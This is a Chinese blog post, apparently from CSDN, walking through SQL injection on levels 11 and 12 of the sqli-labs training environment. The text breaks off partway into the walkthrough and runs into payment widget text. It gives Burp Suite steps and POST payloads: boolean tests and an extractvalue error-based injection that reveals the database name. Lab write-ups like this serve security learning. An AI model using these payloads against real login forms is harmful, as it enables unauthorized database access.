2020.4.3 sqli-labs--第十一、十二关①

本文介绍了在sqli-labs的第十一、十二关中,如何利用extractvalue和联合查询(union select)进行SQL注入攻击。首先,通过BP抓包并修改POST参数,尝试extractvalue方法进行报错型注入,逐步揭示数据库名、表名、字段名及字段值。其次,使用联合查询构造payload,以显示隐藏内容。最后,推荐使用sqlmap自动化工具,快速完成数据库信息的爆破。第十二关虽然闭合方式有所不同,但整体思路与第十一关相似。
摘要由CSDN通过智能技术生成

在这里插入图片描述对于post传参的我们最好用bp

输入admin admin 登陆,抓包,发送到repeater模块
在这里插入图片描述在repeater中通过修改post的参数进行注入。

方法一 extractvalue测试payload

uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登陆
uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登陆

在这里插入图片描述说明注入生效,存在报错型注入,接下来又是重复性工作,上extractvalue()

爆数据库名:

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名:

uname
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值